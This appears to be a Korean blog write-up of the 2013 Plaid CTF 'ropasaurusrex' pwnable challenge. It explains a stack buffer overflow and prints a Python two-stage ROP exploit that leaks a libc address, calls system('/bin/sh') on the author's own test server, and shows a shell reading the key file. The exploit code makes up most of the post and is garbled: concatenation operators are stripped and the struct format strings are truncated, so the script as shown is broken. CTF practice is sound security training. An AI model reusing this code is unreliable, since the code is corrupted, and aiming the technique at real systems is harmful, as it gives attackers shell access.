2013 Plaid CTF ropsaurusrex Exploit

대회 당시엔 libc 파일까지 다 주어졋던것으로 기억한다.

이 당시엔 pwnable 의 p도 모르던 상태라 손대지도 못했지만, 지금은 어느정도 풀만했다.

바이너리는 서버에 demonized 형식으로 돌아가고 있었으며, 내 서버에서도 p0p0pret 의 도움을 받아 리모트 환경으로 세팅했다.

취약점은 딱 '한 눈에' 보일만한 취약점이며, 간단한 Stack-based BufferOverflow 취약점이다.

ropasaurusrex

NX와 ASLR이 모두 설정되어 있어서 ROP 체인을 이용해야만 했다.

Payload 는 Stage1 과 Stage2 로 나뉘며 1에선 write_got 을 leak 시켜 system의 주소를 얻고, 2에선 system 함수를 실행시켜 권한을 획득한다.

http://pastebin.com/1wxt65qn Exploit

import os

import struct

from socket import *

import time

def GOT_SHELL(sock):

command=""

while(command != 'quit'):

command=raw_input("> ")

sock.send(command "\n")

time.sleep(0.5)

print sock.recv(0x4096)

return

p = lambda x : struct.pack("

up = lambda x : struct.unpack("

ip = "192.168.0.103"

port = 12312 # my server

s = socket(AF_INET, SOCK_STREAM)

s.connect((ip, port))

#write = dfcd0

#system = 41280

OFFSET = 0x9ea50

freespace = 0x08049629

ppppr = 0x080484b5

write = 0x0804830c

read = 0x0804832c

write_got = 0

system = 0

cmd = "/bin/sh"

sh = 0x0804867f

############################################################################ stage1

payload = ""

payload = "A"*0x88

payload = "BBBB"

payload = p(write) # ret

payload = p(ppppr 1) # pppr

payload = p(1) # stdout

payload = p(0x08049614) # get write_got

payload = p(4) # size

payload = p(read) # ret

payload = p(ppppr 1) # ppr

payload = p(0)

payload = p(freespace)

payload = p(len(cmd))

payload = p(0x0804841d) # return to vuln function

print "[*] Sending Stage 1 . . ."

s.send(payload)

time.sleep(0.5)

print "[*] Sending Command " cmd " . . ."

s.send(cmd)

write_got = up(s.recv(2048))[0]

print "[!] system addr : " hex(write_got)

############################################################################ stage2

payload = ""

payload = "A"*0x8c

payload = p(write_got - OFFSET) # write system

payload = "AAAA"

#payload = p(sh)

payload = p(freespace)

#####################################################################################

print "[*] Sending Stage 2 . . ."

s.send(payload)

GOT_SHELL(s)

raw_input("Got Shell?")

"""

C:\Users\Administrator\Desktop\sweetchip>exploit.py

[*] Sending Stage 1 . . .

[*] Sending Command /bin/sh . . .

[!] system addr : 0xb7649cd0L

[*] Sending Stage 2 . . .

> whoami

sweetchip

> cat /home/sweetchip/key

This is K3y

>

"""

이상!